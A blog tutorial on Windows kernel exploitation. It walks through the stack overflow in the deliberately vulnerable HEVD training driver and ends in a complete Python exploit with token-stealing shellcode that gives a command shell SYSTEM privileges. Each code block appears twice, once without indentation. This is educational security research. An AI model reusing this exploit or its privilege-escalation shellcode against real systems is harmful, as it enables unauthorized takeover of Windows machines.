Windows Kernel Exploitation Tutorial Part 2: Stack Overflow

Overview

In the part 1, we looked into how to manually setup the environment for Kernel Debugging. If something straightforward is what you want, you can look into this great writeup by hexblog about setting up the VirtualKd for much faster debugging.

In this post, we’d dive deep into the kernel space, and look into our first Stack Overflow example in kernel space through driver exploitation.

A shoutout to hacksysteam for the vulnerable driver HEVD, and fuzzySecurity, for a really good writeup on the topic.

Setting up the driver

For this tutorial, we’d be exploiting the stack overflow module in the HEVD driver. Download the source from github, and either you can build the driver yourself from the steps mentioned on the github page, or download the vulnerable version here and select the one according to the architecture (32-bit or 64-bit).

Then, just load the driver in the debugee VM using the OSR Loader as shown below:

OSR

Check if the driver has been successfully loaded in the debugee VM.

There’s also a .pdb symbol file included with the driver, which you can use as well.

Once the driver is successfully loaded, we can now proceed to analyze the vulnerability.

Analysis

If we look into the source code of the driver, and see the StackOverflow.c file, hacksysteam has done a really good job in demonstrating both the vulnerable and the secure version of the driver code.

#ifdef SECURE
// Secure Note: This is secure because the developer is passing a size
// equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,
// there will be no overflow
RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
#else
DbgPrint("[+] Triggering Stack Overflow\n");

// Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
// because the developer is passing the user supplied size directly to
// RtlCopyMemory()/memcpy() without validating if the size is greater or
// equal to the size of KernelBuffer
RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
#endif
}
__except (EXCEPTION_EXECUTE_HANDLER) {
Status = GetExceptionCode();
DbgPrint("[-] Exception Code: 0x%X\n", Status);
}

#ifdef SECURE

// Secure Note: This is secure because the developer is passing a size

// equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,

// there will be no overflow

RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));

#else

DbgPrint("[+] Triggering Stack Overflow\n");

// Vulnerability Note: This is a vanilla Stack based Overflow vulnerability

// because the developer is passing the user supplied size directly to

// RtlCopyMemory()/memcpy() without validating if the size is greater or

// equal to the size of KernelBuffer

RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);

#endif

}

__except (EXCEPTION_EXECUTE_HANDLER) {

Status = GetExceptionCode();

DbgPrint("[-] Exception Code: 0x%X\n", Status);

}

Here we see that in the insecure version, RtlCopyMemory() is taking the user supplied size directly without even validating it, whereas in the secure version, the size is limited to the size of the kernel buffer. This vulnerability in the insecure version enables us to exploit the stack overflow vulnerability.

Let’s analyze the driver in IDA Pro, to understand how and where the Stack Overflow module is triggered:

ida1

From the flow, let’s analyze the IrpDeviceIoCtlHandler call.

ida2

We see that if the IOCTL is 0x222003h, the pointer jumps to the StackOverflow module. So, we now have the way to call the Stack Overflow module, let’s look into the TriggerStackOverflow function.

Ida3

Important thing to note here is the length defined for the KernelBuffer, i.e. 0x800h (2048).

Exploitation

Now that we have all the relevant information, let’s start building our exploit. I’d be using DeviceIoControl() to interact with the driver, and python to build our exploit.

import ctypes, sys
from ctypes import *

kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:
    print "*** Couldn't get Device Driver handle."
    sys.exit(0)

buf = "A"*2048
bufLength = len(buf)

kernel32.DeviceIoControl(hevDevice, 0x222003, buf, bufLength, None, 0, byref(c_ulong()), None)

import ctypes, sys

from ctypes import *

kernel32 = windll.kernel32

hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:

print "*** Couldn't get Device Driver handle."

sys.exit(0)

buf = "A"*2048

bufLength = len(buf)

kernel32.DeviceIoControl(hevDevice, 0x222003, buf, bufLength, None, 0, byref(c_ulong()), None)

Let’s fire up the WinDbg in debugger machine, put a breakpoint at TriggerStackOverflow function and analyze the behavior when we send the data of length 0x800h (2048).

!sym noisy
.reload;ed Kd_DEFAULT_Mask 8;
bp HEVD!TriggerStackOverflow

!sym noisy

.reload;ed Kd_DEFAULT_Mask 8;

bp HEVD!TriggerStackOverflow

Windbg1

What we see is, that though our breakpoint is hit, there’s no overflow or crash that occured. Let’s increase the buffer size to 0x900 (2304) and analyze the output.

Windbg2

Bingo, we get a crash, and we can clearly see that it’s a vanilla EIP overwrite, and we are able to overwrite EBP as well.

Through the classic metasploit’s pattern create and offset scripts, we can easily figure out the offset for EIP, and adjusting for the offset, the script looks like:

import ctypes, sys
from ctypes import *

kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:
    print "*** Couldn't get Device Driver handle."
    sys.exit(0)

buf = "A"*2080 + "B"*4 + "C"*220
bufLength = len(buf)

kernel32.DeviceIoControl(hevDevice, 0x222003, buf, bufLength, None, 0, byref(c_ulong()), None)

import ctypes, sys

from ctypes import *

kernel32 = windll.kernel32

hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:

print "*** Couldn't get Device Driver handle."

sys.exit(0)

buf = "A"*2080 + "B"*4 + "C"*220

bufLength = len(buf)

kernel32.DeviceIoControl(hevDevice, 0x222003, buf, bufLength, None, 0, byref(c_ulong()), None)

windbg3

Now that we have the control of EIP and have execution in kernel space, let’s proceed with writing our payload.

Because of the DEP, we can’t just execute the instructions directly passed onto the stack, apart from return instructions. There are several methods to bypass DEP, but for the simplicity, I’d be using VirtualAlloc() to allocate a new block of executable memory, and copy our shellcode in that to be executed.

And for our shellcode, I’d be using the sample token stealing payload given by the hacksysteam in their payloads.c file.

pushad ; Save registers state

; Start of Token Stealing Stub
xor eax, eax ; Set ZERO
mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PcrbData.CurrentThread
; _KTHREAD is located at FS:[0x124]

mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process

mov ecx, eax ; Copy current process _EPROCESS structure

mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4

SearchSystemPID:
mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, FLINK_OFFSET
cmp [eax + PID_OFFSET], edx ; Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID

mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
; with SYSTEM process nt!_EPROCESS.Token
; End of Token Stealing Stub

popad ; Restore registers state

pushad ; Save registers state

; Start of Token Stealing Stub

xor eax, eax ; Set ZERO

mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PcrbData.CurrentThread

; _KTHREAD is located at FS:[0x124]

mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process

mov ecx, eax ; Copy current process _EPROCESS structure

mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4

SearchSystemPID:

mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink

sub eax, FLINK_OFFSET

cmp [eax + PID_OFFSET], edx ; Get nt!_EPROCESS.UniqueProcessId

jne SearchSystemPID

mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token

mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token

; with SYSTEM process nt!_EPROCESS.Token

; End of Token Stealing Stub

popad ; Restore registers state

Basically this shellcode saves the register state, finds the current process token and saves it, then finds the SYSTEM process pid, extracts the SYSTEM process token, replace the current process’s token with the SYSTEM process token, and restore the registers. As Windows 7 has SYSTEM pid 4, the shellcode can be written as:

import ctypes, sys, struct
from ctypes import *

kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:
    print "*** Couldn't get Device Driver handle"
    sys.exit(0)

shellcode = ""
shellcode += bytearray(
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
)

ptr = kernel32.VirtualAlloc(c_int(0),c_int(len(shellcode)),c_int(0x3000),c_int(0x40))
buff = (c_char * len(shellcode)).from_buffer(shellcode)
kernel32.RtlMoveMemory(c_int(ptr),buff,c_int(len(shellcode)))
shellcode_final = struct.pack("<L",ptr)

buf = "A"*2080 + shellcode_final
bufLength = len(buf)

kernel32.DeviceIoControl(hevDevice, 0x222003, buf, bufLength, None, 0, byref(c_ulong()), None)

import ctypes, sys, struct

from ctypes import *

kernel32 = windll.kernel32

hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:

print "*** Couldn't get Device Driver handle"

sys.exit(0)

shellcode = ""

shellcode += bytearray(

"\x60" # pushad

"\x31\xc0" # xor eax,eax

"\x64\x8b\x80\x24\x01\x00\x00" # mov eax,[fs:eax+0x124]

"\x8b\x40\x50" # mov eax,[eax+0x50]

"\x89\xc1" # mov ecx,eax

"\xba\x04\x00\x00\x00" # mov edx,0x4

"\x8b\x80\xb8\x00\x00\x00" # mov eax,[eax+0xb8]

"\x2d\xb8\x00\x00\x00" # sub eax,0xb8

"\x39\x90\xb4\x00\x00\x00" # cmp [eax+0xb4],edx

"\x75\xed" # jnz 0x1a

"\x8b\x90\xf8\x00\x00\x00" # mov edx,[eax+0xf8]

"\x89\x91\xf8\x00\x00\x00" # mov [ecx+0xf8],edx

"\x61" # popad

)

ptr = kernel32.VirtualAlloc(c_int(0),c_int(len(shellcode)),c_int(0x3000),c_int(0x40))

buff = (c_char * len(shellcode)).from_buffer(shellcode)

kernel32.RtlMoveMemory(c_int(ptr),buff,c_int(len(shellcode)))

shellcode_final = struct.pack("<L",ptr)

buf = "A"*2080 + shellcode_final

bufLength = len(buf)

kernel32.DeviceIoControl(hevDevice, 0x222003, buf, bufLength, None, 0, byref(c_ulong()), None)

But we soon hit a problem here during execution:

Windbg4

We see that our application recovery mechanism is flawed, and though our shellcode is in memory and executing, the application isn’t able to resume its normal operations. So, we would need to modify and add the instructions that we overwrote, which should help the driver resume it’s normal execution flow. Let’s analyze the behaviour of the application normally, without the shellcode.

Windbg5

We see that we just need to add pop ebp and ret 8 after our shellcode is executed for the driver recovery. The final shellcode, after this, becomes:

import ctypes, sys, struct
from ctypes import *
from subprocess import *

def main():
    kernel32 = windll.kernel32
    hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

    if not hevDevice or hevDevice == -1:
        print "*** Couldn't get Device Driver handle"
        sys.exit(0)

    shellcode = ""
    shellcode += bytearray(
        "\x60"                            # pushad
        "\x31\xc0"                        # xor eax,eax
        "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
        "\x8b\x40\x50"                    # mov eax,[eax+0x50]
        "\x89\xc1"                        # mov ecx,eax
        "\xba\x04\x00\x00\x00"            # mov edx,0x4
        "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
        "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
        "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
        "\x75\xed"                        # jnz 0x1a
        "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
        "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
        "\x61"                            # popad
        "\x31\xc0"                        # xor eax,eax
        "\x5d"                            # pop ebp
        "\xc2\x08\x00"                    # ret 0x8
    )

    ptr = kernel32.VirtualAlloc(c_int(0),c_int(len(shellcode)),c_int(0x3000),c_int(0x40))
    buff = (c_char * len(shellcode)).from_buffer(shellcode)
    kernel32.RtlMoveMemory(c_int(ptr),buff,c_int(len(shellcode)))
    shellcode_final = struct.pack("<L",ptr)

    buf = "A"*2080 + shellcode_final
    bufLength = len(buf)

    kernel32.DeviceIoControl(hevDevice, 0x222003, buf, bufLength, None, 0, byref(c_ulong()), None)
    Popen("start cmd", shell=True)

if __name__ == "__main__":
    main()

import ctypes, sys, struct

from ctypes import *

from subprocess import *

def main():

kernel32 = windll.kernel32

hevDevice = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:

print "*** Couldn't get Device Driver handle"

sys.exit(0)

shellcode = ""

shellcode += bytearray(

"\x60" # pushad

"\x31\xc0" # xor eax,eax

"\x64\x8b\x80\x24\x01\x00\x00" # mov eax,[fs:eax+0x124]

"\x8b\x40\x50" # mov eax,[eax+0x50]

"\x89\xc1" # mov ecx,eax

"\xba\x04\x00\x00\x00" # mov edx,0x4

"\x8b\x80\xb8\x00\x00\x00" # mov eax,[eax+0xb8]

"\x2d\xb8\x00\x00\x00" # sub eax,0xb8

"\x39\x90\xb4\x00\x00\x00" # cmp [eax+0xb4],edx

"\x75\xed" # jnz 0x1a

"\x8b\x90\xf8\x00\x00\x00" # mov edx,[eax+0xf8]

"\x89\x91\xf8\x00\x00\x00" # mov [ecx+0xf8],edx

"\x61" # popad

"\x31\xc0" # xor eax,eax

"\x5d" # pop ebp

"\xc2\x08\x00" # ret 0x8

)

ptr = kernel32.VirtualAlloc(c_int(0),c_int(len(shellcode)),c_int(0x3000),c_int(0x40))

buff = (c_char * len(shellcode)).from_buffer(shellcode)

kernel32.RtlMoveMemory(c_int(ptr),buff,c_int(len(shellcode)))

shellcode_final = struct.pack("<L",ptr)

buf = "A"*2080 + shellcode_final

bufLength = len(buf)

kernel32.DeviceIoControl(hevDevice, 0x222003, buf, bufLength, None, 0, byref(c_ulong()), None)

Popen("start cmd", shell=True)

if __name__ == "__main__":

main()

And W00tW00t, we get the nt authority\system privileges, successfully exploiting our vulnerability.

system

7 thoughts on “Windows Kernel Exploitation Tutorial Part 2: Stack Overflow”

Pingback: Windows安全相关工具/资料收集 | ASPIRE
Pingback: Ma lecture cybersecurité, informatique et divers du mois n°9 | Alexandre J. blog sur la sécurité informatique et la sensibilisation des entreprises et particuliers
Pingback: Windows Kernel Exploitation Tutorial Part 3: Arbitrary Memory Overwrite (Write-What-Where) - rootkit
Pingback: OSEE - AWEstralia 2018 review | www.jollyfrogs.com
Misty says:

November 13, 2017 at 23:06

Spot on witth this write-up, I truly feel this site needs a great deal
more attention. I’ll probably be returning to read through
more, thanks for the advice!

อาบน้ำ says:

November 26, 2017 at 17:30

Thanks veгy interesting blog!

Someone says:

July 20, 2018 at 23:11

Thank you for your article. I have a little question.

You are allocating memory with VirtualAlloc in layout of your python process, but how it is accessed from kernelmode? As i understand this is only for your process virtual memory. Is kernel driver attaches to process that called IOCTL or what?

Thanks.

Overview

Setting up the driver

Analysis

Exploitation

7 thoughts on “Windows Kernel Exploitation Tutorial Part 2: Stack Overflow”

Leave a Reply Cancel reply